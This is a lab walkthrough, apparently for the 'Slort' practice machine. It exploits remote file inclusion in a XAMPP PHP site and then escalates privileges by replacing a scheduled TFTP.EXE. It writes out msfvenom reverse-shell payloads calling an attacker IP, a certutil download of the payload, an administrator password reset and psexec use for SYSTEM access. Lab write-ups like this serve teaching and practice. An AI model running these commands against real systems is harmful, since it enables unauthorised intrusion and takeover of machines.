> For the complete documentation index, see [llms.txt](https://fg0x0.gitbook.io/fg0x0s-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://fg0x0.gitbook.io/fg0x0s-notes/offensive-security/pg-practice/get-to-work/slort.md).

# Slort

<figure><img src="/files/FaAT5pTwPkq7ReE2zS2r" alt=""><figcaption></figcaption></figure>

### Nmap

```bash
sudo nmap 192.168.230.53 -p- -sS -sV

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
```

Both port 8080 and 4443 contain the same web directory redirecting both to the /dashboard/ directory for XAMPP.

<figure><img src="/files/kecn19JdLrDjPzxtZRZg" alt=""><figcaption></figcaption></figure>

Running `dirsearch.py` against the target reveals the /site page.

```
python3 dirsearch.py -u http://192.168.230.53:8080 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url 
```

<figure><img src="/files/PibQHNDEkrFWteXUCWC7" alt=""><figcaption></figcaption></figure>

The /site/index.php page:

<figure><img src="/files/9FQkZZgfSjWoYoK3Geoz" alt=""><figcaption></figcaption></figure>

Paying close attention to the full address of the index.php page we can see the following:

```
http://192.168.230.53:8080/site/index.php?page=main.php
```

Looking at the part index.php?page=\<Value> we can test for RFI to see if vulnerable. I created a test.txt file on my attacking machine and then hosted the directory with a `Python SimpleHTTPServer`. Then browsed to the following:

```
http://192.168.230.53:8080/site/index.php?page=http://192.168.49.230/test.txt
```

This confirms RFI:

<figure><img src="/files/HE70WKM7u9w7NKF8jEPD" alt=""><figcaption></figcaption></figure>

As we know we are running PHP we can generate a PHP reverse shell with `msfvenom` in order to catch a reverse shell using the RFI.

```
msfvenom -p php/reverse_php LHOST=192.168.49.230 LPORT=21 -f raw > phpreverseshell.php
```

<figure><img src="/files/j66aRJ0bwf2s18bOGMsU" alt=""><figcaption></figcaption></figure>

Host this in the same directory as the `Python SimpleHTTPServer` and ensure the listening port is set to 21. Then in the browser browse to the shell we just generated.

```
http://192.168.230.53:8080/site/index.php?page=http://192.168.49.230/phpreverseshell.php
```

<figure><img src="/files/yAV1phEpj3W7oPQ5BGXX" alt=""><figcaption></figcaption></figure>

Once we are connected we are running as the user rupert. Looking through the C:\ root directory we have a folder called backup. Looking at the contents within and reading info.txt we see that the note mentions `TFTP.EXE` is executed every 5 minutes.

<figure><img src="/files/mwYJ4gD5pjKG4QsEZxlV" alt=""><figcaption></figcaption></figure>

I was able to delete `TFTP.EXE` which means we can replace it with a malicious shell. Knowing this we can generate a reverse shell with `msfvenom` and call it `TFTP.EXE`.

```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.230 LPORT=21 -f exe > TFTP.EXE 
```

The shell was then uploaded with `certutil.exe`.

```
certutil.exe -f -urlcache -split http://192.168.49.230/TFTP.EXE
```

<figure><img src="/files/o8mbvFb9gfUx4lg3kx9L" alt=""><figcaption></figcaption></figure>

A `netcat` listener was set up on port 21 and after 5 minutes the `TFTP.EXE` was executed as part of the scheduled task and we receive an administrator shell.

<figure><img src="/files/s0v0eejNkSZjIJMLWlEl" alt=""><figcaption></figcaption></figure>

As we are administrator we can then escalate to SYSTEM by fist changing the administrator password:

```
net user administrator Password123
```

<figure><img src="/files/1qT4zVgaXhmBD9PwuSz8" alt=""><figcaption></figcaption></figure>

Then using `Psexec.py` to gain shell as SYSTEM.

```
sudo python2 psexec.py /administrator:Password123@192.168.230.53 
```

<figure><img src="/files/RWSNvYA7pksLT3SWBBf3" alt=""><figcaption></figcaption></figure>
